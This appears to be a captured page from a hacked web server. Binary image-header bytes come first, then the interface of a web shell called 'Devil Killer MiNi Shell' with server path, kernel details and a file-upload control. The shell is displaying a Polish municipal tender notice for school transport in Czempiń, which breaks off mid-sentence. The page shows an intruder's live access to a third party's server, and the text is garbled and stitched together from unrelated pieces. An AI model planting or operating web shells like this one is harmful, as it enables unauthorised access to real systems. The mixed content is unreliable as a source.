JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240715/0041365101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Codzienny dowóz i odwóz dzieci do placówek oświatowych w roku szkolnym 2024/2025. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA CZEMPIŃ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 631259287</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. ks. Jerzego Popiełuszki 25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Czempiń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">64-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">wielkopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL417 - Leszczyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">61 28 26 703 w.138</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.kasprzyk@ug.czempin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.czempin.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Codzienny dowóz i odwóz dzieci do placówek oświatowych w roku szkolnym 2024/2025. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8142b17f-cc5c-42b0-a53b-67200e06e0d0</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00413651</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00029922/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Codzienny dowóz i odwóz dzieci do placówek oświatowych w roku szkolnym 2024/2025</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/czempin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/czempin</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o<br/>udzielenie zamówienia, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana<br/>informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków<br/>określonych w PZP, odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się<br/>środki komunikacji elektronicznej zdefiniowane w ustawie z dnia18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z<br/>2020 r. poz. 344). Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 PZP, podmiotowe środki dowodowe, pełnomocnictwa,<br/>zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych,<br/>w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. Ofertę, a także oświadczenie o jakim mowa w Rozdziale 10 pkt. 1 SWZ<br/>składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują elektronicznie za pomocą<br/>platformazakupowa.pl (dalej jako „Platforma”), dostępną pod adresem:https://platformazakupowa.pl/pn/czempin i formularza „Wyślij<br/>wiadomość do zamawiającego” dostępnego na stronie dotyczącej danego postepowania (nie dotyczy składania ofert). W sytuacjach<br/>awaryjnych np. w przypadku niedziałania Platformy, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na<br/>adres: a.kasprzyk@ug.czempin.pl (nie dotyczy składania ofert). Zamawiający określa niezbędne wymagania sprzętowo-aplikacyjne<br/>umożliwiające pracę na Platformie, tj.: a) stały dostęp do sieci Internet, b) komputer klasy PC lub MAC, c) zainstalowana dowolna<br/>przeglądarka internetowa, np. Google Chrome, FireFox, d) włączona obsługa JavaScript, e) zainstalowany program Adobe Acrobat<br/>Reader, lub inny obsługujący format plików .pdf, f) Platforma działa według standardu przyjętego w komunikacji sieciowej -<br/>kodowanie UTF8, g) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar. Zamawiający zamieści na stronie<br/>internetowej https://platformazakupowa.pl/pn/czempin dokumenty określone w przepisach PZP. W korespondencji kierowanej do<br/>Zamawiającego Wykonawcy powinni posługiwać się numerem przedmiotowego postępowania. Wykonawca może zwrócić się do<br/>zamawiającego z wnioskiem o wyjaśnienie treści SWZ za pośrednictwem Platformy i formularza „Wyślij wiadomość do<br/>zamawiającego” dostępnego na stronie dotyczącej danego postępowania. Zamawiający będzie przekazywał Wykonawcom<br/>informacje w formie elektronicznej za pośrednictwem Platformy. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji,<br/>zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji „Komunikaty”. Korespondencja,<br/>której zgodnie z obowiązującymi przepisami adresatem jest konkretny Wykonawca, będzie przekazywana w formie elektronicznej za<br/>pośrednictwem Platformy do konkretnego Wykonawcy. Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w<br/>szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w<br/>niniejszym postępowaniu przy użyciu platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie<br/>internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. Za datę wpływu oświadczeń, ofert, wniosków,<br/>zaświadczeń oraz informacji przyjmuje się datę ich przekazania do Platformy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna RODO zawarta w rozdziale 22 SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">FZ.271.1.28.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Codzienny dowóz uczniów niepełnosprawnych do Specjalnego Ośrodka Szkolno – Wychowawczego im. Janusza Korczaka w Mosinie wraz z odwozem. Dalsza część opisu przedmiotu zamówienia została zawarta w SWZ oraz załącznikach do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 4.7	Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy usług w zakresie transportu drogowego w stosunku do łącznej całkowitej ilości kilometrów („Opcja”). Usługi będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie przekraczała 20 % wartości Umowy określonej zgodnie z § 6 ust. 1 Projektu umowy stanowiącego załącznik nr 9 do SWZ. Podstawą określenia wartości usług zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe za 1 km zawarte w formularzu ofertowym stanowiącym część Oferty. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert wartość wagowa wyrażona w (%) zostanie wyrażona w punktach (1% = 1pkt.)<br/><br/>17.2	Oferty będą oceniane w odniesieniu do najkorzystniejszych danych przedstawionych przez Wykonawców odpowiednio w zakresie kryterium, w następujący sposób:<br/>1)	Kryterium I - Cena brutto (C) – waga 60% <br/>W ramach kryterium „Cena brutto” ocena ofert dokonana zgodnie z poniższym wzorem: <br/><br/>	C =	cena brutto oferty najtańszej x 60 pkt.<br/> cena brutto oferty ocenianej	<br/>gdzie:	C -	Wartość punktowa badanej oferty<br/> <br/><br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>Ocenie w ramach kryterium „cena brutto” podlegać będzie cena brutto podana w ofercie.<br/>2)	czas reakcji (D) – waga 40%<br/>Ocenie będzie podlegał czas w jakim Wykonawca zobowiązuje się do zapewnienia transportu zastępczego przez innego przewoźnika/własnego transportu zastępczego lub innego pojazdu zastępczego, do którego posiada tytuł prawny od zaistnienia sytuacji uniemożliwiającej zrealizowanie kursu. <br/><br/>W ramach kryterium „Czas reakcji” ocena zostanie dokonana zgodnie z poniższym wzorem:<br/><br/>	D =	Najkrótszy czas reakcji x 40 pkt.<br/> Czas reakcji oferty ocenianej	<br/><br/>gdzie: D – wartość punktowa badanej oferty<br/> <br/>Maksymalna ilość punktów do uzyskania w kryterium „Czas reakcji” to 40,00 pkt. <br/><br/>UWAGA: <br/>a)	„Czas reakcji” musi być określony w pełnych minutach.<br/>b)	Zamawiający ustala minimalny czas reakcji, który wynosi 30 minut.<br/>c)	Zamawiający ustala maksymalny czas reakcji, który wynosi 90 minut.<br/>d)	Czas reakcji krótszy niż 30 minut, dla potrzeb obliczania punktacji będzie traktowany jak 30 minut.<br/>e)	Czas reakcji dłuższy niż 90 minut, dla potrzeb obliczania punktacji będzie traktowany jak 90 minut. <br/>f)	W przypadku braku wskazania w ofercie czasu reakcji Wykonawca otrzyma 0 punktów w tym kryterium.<br/>g)	Czas reakcji liczony jest od momentu telefonicznego powiadomienia Wykonawcy.<br/>17.3 Ostateczną ocenę oferty stanowi suma punktów uzyskanych w kryteriach określonych w pkt. 17.2., obliczona wg wzoru:<br/><br/>O = C + D - ostateczna ocena danej oferty<br/>C - wartość punktowa uzyskana przez badaną ofertę za kryterium cena<br/>D - wartość punktowa uzyskana przez badaną ofertę za kryterium czas reakcji <br/>17.4 Za najkorzystniejszą w danej części uznana zostanie oferta z najwyższą ilością uzyskanych punktów w w/w kryteriach oceny ofert.<br/> Wykonawca może uzyskać maksymalnie 100 punktów.<br/><br/>17.5 Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyżej wadze, Zamawiający wybiera ofertę z najniższą ceną. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający wzywa do wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Codzienny dowóz dzieci z terenu Gminy Czempiń do Zespołu Szkół Nr 5 im. Marii Konopnickiej w Kościanie wraz z odwozem. Dalsza część opisu przedmiotu zamówienia została zawarta w SWZ oraz załącznikach do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 4.7	Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy usług w zakresie transportu drogowego w stosunku do łącznej całkowitej ilości kilometrów („Opcja”). Usługi będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie przekraczała 20 % wartości Umowy określonej zgodnie z § 6 ust. 1 Projektu umowy stanowiącego załącznik nr 9a do SWZ. Podstawą określenia wartości usług zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe za 1 km zawarte w formularzu ofertowym stanowiącym część Oferty <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy ocenie ofert wartość wagowa wyrażona w (%) zostanie wyrażona w punktach (1% = 1pkt.)<br/><br/>17.2	Oferty będą oceniane w odniesieniu do najkorzystniejszych danych przedstawionych przez Wykonawców odpowiednio w zakresie kryterium, w następujący sposób:<br/>1)	Kryterium I - Cena brutto (C) – waga 60% <br/>W ramach kryterium „Cena brutto” ocena ofert dokonana zgodnie z poniższym wzorem: <br/><br/>	C =	cena brutto oferty najtańszej x 60 pkt.<br/> cena brutto oferty ocenianej	<br/>gdzie:	C -	Wartość punktowa badanej oferty<br/> <br/><br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>Ocenie w ramach kryterium „cena brutto” podlegać będzie cena brutto podana w ofercie.<br/>2)	czas reakcji (D) – waga 40%<br/>Ocenie będzie podlegał czas w jakim Wykonawca zobowiązuje się do zapewnienia transportu zastępczego przez innego przewoźnika/własnego transportu zastępczego lub innego pojazdu zastępczego, do którego posiada tytuł prawny od zaistnienia sytuacji uniemożliwiającej zrealizowanie kursu. <br/><br/>W ramach kryterium „Czas reakcji” ocena zostanie dokonana zgodnie z poniższym wzorem:<br/><br/>	D =	Najkrótszy czas reakcji x 40 pkt.<br/> Czas reakcji oferty ocenianej	<br/><br/>gdzie: D – wartość punktowa badanej oferty<br/> <br/>Maksymalna ilość punktów do uzyskania w kryterium „Czas reakcji” to 40,00 pkt. <br/><br/>UWAGA: <br/>a)	„Czas reakcji” musi być określony w pełnych minutach.<br/>b)	Zamawiający ustala minimalny czas reakcji, który wynosi 30 minut.<br/>c)	Zamawiający ustala maksymalny czas reakcji, który wynosi 90 minut.<br/>d)	Czas reakcji krótszy niż 30 minut, dla potrzeb obliczania punktacji będzie traktowany jak 30 minut.<br/>e)	Czas reakcji dłuższy niż 90 minut, dla potrzeb obliczania punktacji będzie traktowany jak 90 minut. <br/>f)	W przypadku braku wskazania w ofercie czasu reakcji Wykonawca otrzyma 0 punktów w tym kryterium.<br/>g)	Czas reakcji liczony jest od momentu telefonicznego powiadomienia Wykonawcy.<br/>17.3 Ostateczną ocenę oferty stanowi suma punktów uzyskanych w kryteriach określonych w pkt. 17.2., obliczona wg wzoru:<br/><br/>O = C + D - ostateczna ocena danej oferty<br/>C - wartość punktowa uzyskana przez badaną ofertę za kryterium cena<br/>D - wartość punktowa uzyskana przez badaną ofertę za kryterium czas reakcji <br/>17.4 Za najkorzystniejszą w danej części uznana zostanie oferta z najwyższą ilością uzyskanych punktów w w/w kryteriach oceny ofert.<br/> Wykonawca może uzyskać maksymalnie 100 punktów.<br/><br/>17.5 Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze. Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyżej wadze, Zamawiający wybiera ofertę z najniższą ceną. Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w zdaniu poprzednim, Zamawiający wzywa do wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>Ocena ofert zostanie dokonana oddzielnie dla każdej części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">czas reakcji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz uczniów Szkoły Podstawowej im. Bohaterów Westerplatte <br/>w Czempiniu na zajęcia wychowania fizycznego do Hali Sportowej Herkules wraz z odwozem. Dalsza część opisu przedmiotu zamówienia została zawarta w SWZ oraz załącznikach do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 4.7	Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy usług w zakresie transportu drogowego w stosunku do łącznej całkowitej ilości kilometrów („Opcja”). Usługi będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie przekraczała 20 % 